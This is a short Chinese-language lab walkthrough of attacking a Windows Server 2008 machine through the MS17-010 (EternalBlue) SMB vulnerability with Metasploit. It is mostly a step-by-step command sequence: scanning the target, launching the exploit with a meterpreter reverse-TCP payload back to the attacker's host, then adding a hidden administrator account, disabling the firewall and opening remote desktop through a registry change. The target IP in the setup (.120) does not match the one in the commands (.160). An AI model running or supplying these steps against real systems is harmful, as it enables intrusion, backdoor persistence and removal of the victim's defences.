影響版本:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows
Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server
2012 SP0。
環境搭建:
- 攻擊機:kali IP:192.168.120.158
- 靶機:windows server 2008 IP:192.168.120.120
- 啟動資料庫:msfdb start 或者 service postgresql start
具體過程:
1.在kali終端中打開msfconsole,查找ms17_010漏洞子產品
search ms17_010
2.先用auxiliary/scanner/smb/smb_ms17_010子產品掃描目标主機是否存在該漏洞
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.120.160
3.可以看到掃描結果是目标主機可能存在ms17_010漏洞,開始攻擊
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.120.160
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.120.158
4.攻擊成功
5.用shell指令拿到shell控制台權限,進行後門植入
net user hack 123 /add
net localgroup administrators hack /add
net user
net localgroup administrators
6.關閉目标防火牆
netsh advfirewall set allprofiles state off
7.打開對方的3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
8.連接配接遠端桌面